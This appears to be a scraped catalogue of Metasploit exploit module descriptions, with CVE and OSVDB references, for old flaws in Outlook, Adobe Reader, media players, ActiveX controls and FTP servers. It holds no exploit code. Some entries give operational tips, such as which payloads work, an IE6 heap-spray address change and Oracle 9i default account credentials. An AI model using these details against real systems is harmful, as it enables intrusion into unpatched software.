This module exploits a buffer overflow vulnerability in the LoadAniIcon() function of USER32.dll. The flaw is triggered through Outlook Express by using the CURSOR style sheet directive to load a malicious .ANI file. This vulnerability was discovered by Alexander Sotirov of Determina and was rediscovered, in the wild, by McAfee.
MSB-MS07-017
CVE-2007-0038
CVE-2007-1765
OSVDB-33629
BID-23194
http://www.microsoft.com/tech...
http://www.determina.com/secu...
http://www.determina.com/secu...
Outlook ATTACH_BY_REF_ONLY File Execution
It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options.
MSB-MS10-045
CVE-2010-0266
OSVDB-66296
BID-41446
http://www.akitasecurity.nl/a...
Outlook ATTACH_BY_REF_RESOLVE File Execution
It has been discovered that certain e-mail message cause Outlook to create Windows shortcut-like attachments or messages within Outlook. Through specially crafted TNEF streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These files can be local files, but also file stored remotely for example on a file share. Exploitation is limited by the fact that its is not possible for attackers to supply command line options.
MSB-MS10-045
CVE-2010-0266
OSVDB-66296
BID-41446
http://www.akitasecurity.nl/a...
EMC AlphaStor Agent Buffer Overflow
This module exploits a stack buffer overflow in EMC AlphaStor 3.1. By sending a specially crafted message, an attacker may be able to execute arbitrary code.
CVE-2008-2158
OSVDB-45714
http://labs.idefense.com/inte...
ACDSee XPM File Section Buffer Overflow
This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.
CVE-2007-2193
OSVDB-35236
BID-23620
activePDF WebGrabber ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
OSVDB-64579
http://www.activepdf.com/prod...
Adobe Collab.collectEmailInfo() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1. By creating a specially crafted pdf that a contains malformed Collab.collectEmailInfo() call, an attacker may be able to execute arbitrary code.
CVE-2007-5659
OSVDB-41495
Adobe Flash Player "newfunction" Invalid Pointer Use
This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.
CVE-2010-1297
OSVDB-65141
BID-40586
http://www.adobe.com/support/...
http://feliam.wordpress.com/2...
Adobe FlateDecode Stream Predictor 02 Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions before 9.2.
CVE-2009-3459
BID-36600
OSVDB-58729
http://blogs.adobe.com/psirt/...
http://www.adobe.com/support/...
http://www.fortiguard.com/ana...
Adobe Collab.getIcon() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially crafted pdf that a contains malformed Collab.getIcon() call, an attacker may be able to execute arbitrary code.
CVE-2009-0927
OSVDB-53647
http://www.zerodayinitiative....
Adobe Illustrator CS4 v14.0.0
Adobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps) overlong DSC Comment Buffer Overflow Exploit
CVE-2009-4195
BID-37192
OSVDB-60632
http://retrogod.altervista.or...
http://www.exploit-db.com/exp...
Adobe JBIG2Decode Memory Corruption Exploit
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier. This module relies upon javascript for the heap spray.
CVE-2009-0658
OSVDB-52073
http://bl4cksecurity.blogspot...
Adobe Acrobat Bundled LibTIFF Integer Overflow
This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3.
CVE-2010-0188
BID-38195
OSVDB-62526
http://www.adobe.com/support/...
http://secunia.com/blog/76/
http://bugix-security.blogspo...
Adobe Doc.media.newPlayer Use After Free Vulnerability
This module exploits a use after free vulnerability in Adobe Reader and Adobe Acrobat Professional versions up to and including 9.2.
CVE-2009-4324
BID-37331
OSVDB-60980
Adobe PDF Embedded EXE Social Engineering
This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.
CVE-2010-1240
OSVDB-63667
http://blog.didierstevens.com...
http://blog.didierstevens.com...
http://blog.didierstevens.com...
Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.
CVE-2009-3953
OSVDB-61690
http://www.adobe.com/support/...
Adobe util.printf() Buffer Overflow
This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional < 8.1.3. By creating a specially crafted pdf that a contains malformed util.printf() entry, an attacker may be able to execute arbitrary code.
CVE-2008-2992
OSVDB-49520
Altap Salamander 2.5 PE Viewer Buffer Overflow
This module exploits a buffer overflow in Altap Salamander <= v2.5. By creating a malicious file and convincing a user to view the file with the Portable Executable Viewer plugin within a vulnerable version of Salamander, the PDB file string is copied onto the stack and the SEH can be overwritten.
CVE-2007-3314
BID-24557
OSVDB-37579
http://vuln.sg/salamander25-e...
AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to 'Import()', an attacker can overrun a buffer and execute arbitrary code. NOTE: This ActiveX control is NOT marked safe for scripting or initialization.
OSVDB-61964
http://www.exploit-db.com/exp...
http://www.rec-sec.com/2010/0...
Audio Workstation 6.4.2.4.3 pls Buffer Overflow
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3. When opening a malicious pls file with the Audio Workstation, a remote attacker could overflow a buffer and execute arbitrary code.
CVE-2009-0476
OSVDB-55424
http://www.exploit-db.com/exp...
Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Audiotran. This functionality has not been tested in this module.
CVE-2009-0476
OSVDB-55424
http://www.exploit-db.com/exp...
BlazeDVD 5.1 PLF Buffer Overflow
This module exploits a stack over flow in BlazeDVD 5.1. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code.
CVE-2006-6199
OSVDB-30770
BID-35918
CA Antivirus Engine CAB Buffer Overflow
This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. By creating a specially crafted CAB file, an an attacker may be able to execute arbitrary code.
CVE-2007-2864
OSVDB-35245
BID-24330
http://www.zerodayinitiative....
Cain & Abel <= v4.9.24 RDP Buffer Overflow.
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24 and below. An attacker must send the file to victim, and the victim must open the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
CVE-2008-5405
OSVDB-50342
http://www.milw0rm.com/exploi...
BID-32543
AstonSoft DeepBurner (DBR File) Path Buffer Overflow
This module exploits a stack-based buffer overflow in versions 1.9.0.228, 1.8.0, and possibly other versions of AstonSoft's DeepBurner (Pro, Lite, etc). An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded DBR file within a browser, since the DBR extention is registered to DeepBurner.
BID-21657
OSVDB-32356
CVE-2006-6665
http://milw0rm.com/exploits/2950
http://milw0rm.com/exploits/8335
http://www.exploit-db.com/exp...
Destiny Media Player 1.61 PLS M3U Buffer Overflow
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61. An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
CVE-2009-3429
OSVDB-53249
http://www.milw0rm.com/exploi...
BID-33091
DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow
This module exploits a stack buffer overflow in DjVu ActiveX Component. When sending an overly long string to the ImageURL() property of DjVu_ActiveX_MSOffice.dll (3.0) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
CVE-2008-4922
OSVDB-49592
BID-31987
EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in the KeyWorks KeyHelp Activex Control (KeyHelp.ocx 1.2.3120.0). This Activex Control comes bundled with EMC's Documentation ApplicationXtender 5.4.
OSVDB-58423
BID-36546
CA eTrust PestPatrol ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in CA eTrust PestPatrol. When sending an overly long string to the Initialize() property of ppctl.dll (5.6.7.9) an attacker may be able to execute arbitrary code.
CVE-2009-4225
OSVDB-60862
http://www.my-etrust.com/Exte...
Free Download Manager Torrent Parsing Buffer Overflow
This module exploits a stack buffer overflow in Free Download Manager 3.0 Build 844. Arbitrary code execution could occur when parsing a specially crafted torrent file.
CVE-2009-0184
OSVDB-54033
BID-33555
http://freedownload.svn.sourc...
http://freedownload.svn.sourc...
http://secunia.com/secunia_re...
http://downloads.securityfocu...
FeedDemon <= 3.1.0.12 Stack Buffer Overflow
This module exploits a buffer overflow in FeedDemon v3.1.0.12. When the application is used to import a specially crafted opml file, a buffer overflow occurs allowing arbitrary code execution. All versions are suspected to be vulnerable. This vulnerability was originally reported against version 2.7 in February of 2009.
CVE-2009-0546
OSVDB-51753
BID-33630
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
gAlan 0.2.1 Buffer Overflow Exploit
This module exploits a stack buffer overflow in gAlan 0.2.1 By creating a specially crafted galan file, an an attacker may be able to execute arbitrary code.
OSVDB-60897
http://www.exploit-db.com/exp...
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 By creating a specially crafted hhp file, an an attacker may be able to execute arbitrary code.
CVE-2006-0564
OSVDB-22941
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 By creating a specially crafted hhp file, an an attacker may be able to execute arbitrary code.
CVE-2006-0564
OSVDB-22941
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow Exploit
This module exploits a stack buffer overflow in HTML Help Workshop 4.74 By creating a specially crafted hhp file, an an attacker may be able to execute arbitrary code.
CVE-2009-0133
BID-33189
OSVDB-22941
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
This module exploits a stack buffer overflow in HT-MP3Player 1.0. Arbitrary code execution could occur when parsing a specially crafted .HT3 file. NOTE: The player installation does not register the file type to be handled. Therefore, a user must take extra steps to load this file.
CVE-2009-2485
OSVDB-55449
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
PointDev IDEAL Migration Buffer Overflow
This module exploits a stack buffer overflow in versions v9.7 through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of IDEAL Migration. All versions are suspected to be vulnerable. By creating a specially crafted ipj file, an an attacker may be able to execute arbitrary code. NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH
CVE-2009-4265
OSVDB-60681
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
McAfee Remediation Client ActiveX Control Buffer Overflow
This module exploits a stack buffer overflow in McAfee Remediation Agent 4.5.0.41. When sending an overly long string to the DeleteSnapshot() method of enginecom.dll (3.7.0.9) an attacker may be able to execute arbitrary code. This control is not marked safe for scripting, so choose your attack vector accordingly.
http://www.metasploit.com
Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)
This module exploits a stack buffer overflow in Media Jukebox 8.0.400 By creating a specially crafted m3u or pls file, an an attacker may be able to execute arbitrary code.
OSVDB-55924
CVE-2009-2650
Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio. This functionality has not been tested in this module.
OSVDB-56574
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
Mini-Stream 3.0.1.1 Buffer Overflow Exploit
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1 By creating a specially crafted pls file, an an attacker may be able to execute arbitrary code.
OSVDB-61341
http://www.exploit-db.com/exp...
Microsoft Excel Malformed FEATHEADER Record Vulnerability
This module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.
CVE-2009-3129
OSVDB-59860
MSB-MS09-067
BID-36945
http://www.zerodayinitiative....
http://labs.idefense.com/inte...
Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow
This module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.
CVE-2010-0033
OSVDB-62241
MSB-MS10-004
http://www.zerodayinitiative....
http://www.snoop-security.com...
Microsoft Visual Basic VBP Buffer Overflow
This module exploits a stack oveflow in Microsoft Visual Basic 6.0. When a specially crafted vbp file containing a long reference line, an attacker may be able to execute arbitrary code.
CVE-2007-4776
OSVDB-36936
BID-25629
Microsoft Works 7 WkImgSrv.dll WKsPictureInterface() ActiveX Exploit
The Microsoft Works ActiveX control (WkImgSrv.dll) could allow a remote attacker to execute arbitrary code on a system. By passing a negative integer to the WksPictureInterface method, an attacker could execute arbitrary code on the system with privileges of the victim. Change 168430090 /0X0A0A0A0A to 202116108 / 0x0C0C0C0C FOR IE6. This control is not marked safe for scripting, please choose your attack vector carefully.
CVE-2008-1898
OSVDB-44458
Steinberg MyMP3Player 3.0 Buffer Overflow
This module exploits a stack buffer overflow in Steinberg MyMP3Player == 3.0. When the application is used to open a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.
OSVDB-64580
http://www.exploit-db.com/exp...
Orbital Viewer ORB File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.
BID-38436
OSVDB-62580
CVE-2010-0688
http://www.corelan.be:8800/in...
http://www.exploit-db.com/exp...
ProShow Gold v4.0.2549 (PSH File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in ProShow Gold v4.0.2549. An attacker must send the file to victim and the victim must open the file.
CVE-2009-3214
OSVDB-57226
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
SafeNet SoftRemote GROUPNAME Buffer Overflow
This module exploits a stack buffer overflow in SafeNet SoftRemote Security Policy Editor <= 10.8.5. When an attacker creates a specially formatted security policy with an overly long GROUPNAME argument, it is possible to execute arbitrary code.
CVE-2009-3861
OSVDB-59660
http://www.senseofsecurity.co...
SasCam Webcam Server v.2.6.5 Get() method Buffer Overflow
The SasCam Webcam Server ActiveX control is vulnerable to a buffer overflow. By passing an overly long argument via the Get method, a remote attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user. This control is not marked safe for scripting, please choose your attack vector carefully.
CVE-2008-6898
OSVDB-55945
BID-33053
S.O.M.P.L 1.0 Player Buffer Overflow
This module exploits a buffer overflow in Simple Open Music Player v1.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.
OSVDB-64368
http://www.exploit-db.com/exp...
UltraISO CCD File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CCD files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CCD file. NOTE: A file with the same base name, but the extension of "img" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.
CVE-2009-1260
OSVDB-53275
BID-34363
BID-38613
http://www.exploit-db.com/exp...
UltraISO CUE File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in EZB Systems, Inc's UltraISO. When processing .CUE files, data is read from file into a fixed-size stack buffer. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an CUE file. NOTE: A file with the same base name, but the extension of "bin" must also exist. Opening either file will trigger the vulnerability, but the files must both exist.
CVE-2007-2888
OSVDB-36570
BID-24140
http://www.exploit-db.com/exp...
URSoft W32Dasm Disassembler Function Buffer Overflow
This module exploits a buffer overflow in W32Dasm <= v8.93. By creating a malicious file and convincing a user to disassemble the file with a vulnerable version of W32Dasm, the Imports/Exports function is copied to the stack and arbitrary code may be executed locally as the user.
CVE-2005-0308
OSVDB-13169
BID-12352
http://aluigi.altervista.org/...
VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
This module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN. An attacker must send the file to victim and the victim must open the file.
OSVDB-63067
BID-38815
http://www.exploit-db.com/exp...
VideoLAN VLC TiVo Buffer Overflow
This module exploits a buffer overflow in VideoLAN VLC 0.9.4. By creating a malicious TY file, a remote attacker could overflow a buffer and execute arbitrary code.
CVE-2008-4654
OSVDB-49181
BID-31813
VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow
This module exploits a stack-based buffer overflow in the Win32AddConnection function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are reportedly affected. This vulnerability is only present in Win32 builds of VLC. This payload was found to work with the windows/exec and windows/meterpreter/reverse_tcp payloads. However, the windows/meterpreter/reverse_ord_tcp was found not to work.
BID-35500
OSVDB-55509
CVE-2009-2484
http://git.videolan.org/?p=vl...
http://milw0rm.com/exploits/9209
http://www.exploit-db.com/exp...
VUPlayer CUE Buffer Overflow
This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted cue file, an buffer is overwritten allowing for the execution of arbitrary code.
OSVDB-64581
BID-33960
VUPlayer M3U Buffer Overflow
This module exploits a stack over flow in VUPlayer <= 2.49. When the application is used to open a specially crafted m3u file, an buffer is overwritten allowing for the execution of arbitrary code.
CVE-2006-6251
OSVDB-31710
Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)
This module exploits a stack buffer overflow in Xenorate 2.50 By creating a specially crafted xpl file, an an attacker may be able to execute arbitrary code.
OSVDB-57162
http://www.exploit-db.com/exp...
Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow.
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extention is registered to Zinf. This functionality has not been tested in this module.
CVE-2004-0964
OSVDB-10416
http://www.milw0rm.com/exploi...
BID-11248
ISS PAM.dll ICQ Parser Buffer Overflow
This module exploits a stack buffer overflow in the ISS products that use the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation will result in arbitrary code execution as LocalSystem. This exploit only requires 1 UDP packet, which can be both spoofed and sent to a broadcast address. The ISS exception handler will recover the process after each overflow, giving us the ability to bruteforce the service and exploit it multiple times.
CVE-2004-0362
OSVDB-4355
http://www.eeye.com/html/Rese...
http://xforce.iss.net/xforce/...
Kerio Firewall 2.1.4 Authentication Packet Overflow
This module exploits a stack buffer overflow in Kerio Personal Firewall administration authentication process. This module has only been tested against Kerio Personal Firewall 2 (2.1.4).
CVE-2003-0220
OSVDB-6294
BID-7180
http://www1.corest.com/common...
3Com 3CDaemon 2.0 FTP Username Overflow
This module exploits a vulnerability in the 3Com 3CDaemon FTP service. This package is being distributed from the 3Com web site and is recommended in numerous support documents. This module uses the USER command to trigger the overflow.
CVE-2005-0277
OSVDB-12810
OSVDB-12811
BID-12155
ftp://ftp.3com.com/pub/utilbi...
Cesar FTP 0.99g MKD Command Buffer Overflow
This module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g. You must have valid credentials to trigger this vulnerability. Also, you only get one chance, so choose your target carefully.
CVE-2006-2961
OSVDB-26364
BID-18586
http://secunia.com/advisories...
BolinTech Dream FTP Server 1.02 Format String
This module exploits a format string overflow in the BolinTech Dream FTP Server version 1.02. Based on the exploit by SkyLined.
CVE-2004-2074
OSVDB-4986
BID-9800
http://www.milw0rm.com/exploi...
Easy File Sharing FTP Server 2.0 PASS Overflow
This module exploits a stack buffer overflow in the Easy File Sharing 2.0 service. By sending an overly long password, an attacker can execute arbitrary code.
CVE-2006-3952
OSVDB-27646
BID-19243
EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which leads to a stack based buffer overflow. EasyFTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.
OSVDB-62134
http://paulmakowski.wordpress...
http://paulmakowski.wordpress...
http://seclists.org/bugtraq/2...
http://code.google.com/p/easy...
https://tegosecurity.com/etc/...
http://www.securityfocus.com/...
EasyFTP Server <= 1.7.0.11 LIST Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11. credit goes to Karn Ganeshan. NOTE: Although, this is likely to exploit the same vulnerability as the 'easyftp_cwd_fixret' exploit, it uses a slightly different vector.
OSVDB-62134
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
EasyFTP Server <= 1.7.0.11 MKD Command Stack Buffer Overflow
This module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11 and earlier. EasyFTP fails to check input size when parsing 'MKD' commands, which leads to a stack based buffer overflow. NOTE: EasyFTP allows anonymous access by default. However, in order to access the 'MKD' command, you must have access to an account that can create directories. After version 1.7.0.12, this package was renamed "UplusFtp". This exploit utilizes a small piece of code that I\'ve referred to as 'fixRet'. This code allows us to inject of payload of ~500 bytes into a 264 byte buffer by 'fixing' the return address post-exploitation. See references for more information.
OSVDB-62134
http://www.exploit-db.com/exp...
http://www.exploit-db.com/exp...
FileCopa FTP Server pre 18 Jul Version
This module exploits the buffer overflow found in the LIST command in fileCOPA FTP server pre 18 Jul 2006 version discovered by www.appsec.ch
CVE-2006-3726
OSVDB-27389
BID-19065
freeFTPd 1.0 Username Overflow
This module exploits a stack buffer overflow in the freeFTPd multi-protocol file transfer service. This flaw can only be exploited when logging has been enabled (non-default).
CVE-2005-3683
OSVDB-20909
BID-15457
http://lists.grok.org.uk/pipe...
GlobalSCAPE Secure FTP Server Input Overflow
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( or anonymous access) is required for this exploit to work.
CVE-2005-1415
OSVDB-16049
BID-13454
http://archives.neohapsis.com...
HTTPDX tolog() Function Format String Vulnerability
This module exploits a format string vulnerability in HTTPDX FTP server. By sending an specially crafted FTP command containing format specifiers, an attacker can corrupt memory and execute arbitrary code. By default logging is off for HTTP, but enabled for the 'moderator' user via FTP.
CVE-2009-4769
OSVDB-60181
LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
This module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600 client that is triggered through an excessively long PASV reply command. This module was ported from the original exploit by drG4njubas with minor improvements.
CVE-2003-0558
OSVDB-4587
BID-7860
http://www.milw0rm.com/exploi...
Microsoft IIS FTP Server NLST Response Overflow
This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account)
http://milw0rm.com/exploits/9541
CVE-2009-3023
OSVDB-57589
BID-36189
NetTerm NetFTPD USER Buffer Overflow
This module exploits a vulnerability in the NetTerm NetFTPD application. This package is part of the NetTerm package. This module uses the USER command to trigger the overflow.
CVE-2005-1323
OSVDB-15865
http://seclists.org/lists/ful...
BID-13396
Oracle 9i XDB FTP PASS Overflow (win32)
By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference.
CVE-2003-0727
OSVDB-2449
BID-8375
http://www.blackhat.com/prese...
Oracle 9i XDB FTP UNLOCK Overflow (win32)
By passing an overly long token to the UNLOCK command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. Oracle9i includes a number of default accounts, including dbsnmp:dbsmp, scott:tiger, system:manager, and sys:change_on_install.
CVE-2003-0727
OSVDB-2449
BID-8375
http://www.blackhat.com/prese...
ProFTP 2.9 Banner Remote Buffer Overflow Exploit
This module exploits a buffer overflow in the ProFTP 2.9 client that is triggered through an excessively long welcome message.
CVE-2009-3976
OSVDB-57394
http://www.labtam-inc.com/ind...
KarjaSoft Sami FTP Server v2.02 USER Overflow
This module exploits the KarjaSoft Sami FTP Server version 2.02 by sending an excessively long USER string. The stack is overwritten when the administrator attempts to view the FTP logs. Therefore, this exploit is passive and requires end-user interaction. Keep this in mind when selecting payloads. When the server is restarted, it will re-execute the exploit until the logfile is manually deleted via the file system.
CVE-2006-0441
CVE-2006-2212
OSVDB-25670
BID-16370
BID-22045
BID-17835
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
http://www.milw0rm.com/exploi...
Sasser Worm avserve FTP PORT Buffer Overflow
This module exploits the FTP server component of the Sasser worm. By sending an overly long PORT command the stack can be overwritten.
OSVDB-6197
Serv-U FTPD MDTM Overflow
This is an exploit for the Serv-U\'s MDTM command timezone overflow. It has been heavily tested against versions 4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against nt4/2k/xp/2k3. I have also had success against version 3, but only tested 1 version/os. The bug is in all versions prior to 5.0.0.4, but this exploit will not work against versions not listed above. You only get one shot, but it should be OS/SP independent. This exploit is a single hit, the service dies after the shellcode finishes execution.
CVE-2004-0330
OSVDB-4073
http://archives.neohapsis.com...
http://www.cnhonker.com/advis...
http://www.cnhonker.com/index...
BID-9751
SlimFTPd LIST Concatenation Overflow
This module exploits a stack buffer overflow in the SlimFTPd server. The flaw is triggered when a LIST command is received with an overly-long argument. This vulnerability affects all versions of SlimFTPd prior to 3.16 and was discovered by Raphael Rigo.
CVE-2005-2373
OSVDB-18172
BID-14339
Trellian FTP Client 3.01 PASV Remote Buffer Overflow
This module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered through an excessively long PASV message.
CVE-2010-1465
OSVDB-63812
http://www.exploit-db.com/exp...
Vermillion FTP Daemon PORT Command Memory Corruption
This module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending an specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using "vftpd.exe install". If so, the service does not restart automatically, giving an attacker only one attempt.
OSVDB-62163
http://www.exploit-db.com/exp...
http://www.global-evolution.i...
War-FTPD 1.65 Password Overflow
This exploits the buffer overflow found in the PASS command in War-FTPD 1.65. This particular module will only work reliably against Windows 2000 targets. The server must be configured to allow anonymous logins for this exploit to succeed. A failed attempt will bring down the service completely.
CVE-1999-0256
OSVDB-875
BID-10078
http://lists.insecure.org/lis...
War-FTPD 1.65 Username Overflow
This module exploits a buffer overflow found in the USER command of War-FTPD 1.65.
CVE-1999-0256
OSVDB-875
BID-10078
http://lists.insecure.org/lis...
Texas Imperial Software WFTPD 3.23 SIZE Overflow
This module exploits a buffer overflow in the SIZE verb in Texas Imperial's Software WFTPD 3.23.
CVE-2006-4318
OSVDB-28134
BID-19617
WS-FTP Server 5.03 MKD Overflow
This module exploits the buffer overflow found in the MKD command in IPSWITCH WS_FTP Server 5.03 discovered by Reed Arvin.
CVE-2004-1135
OSVDB-12509
BID-11772
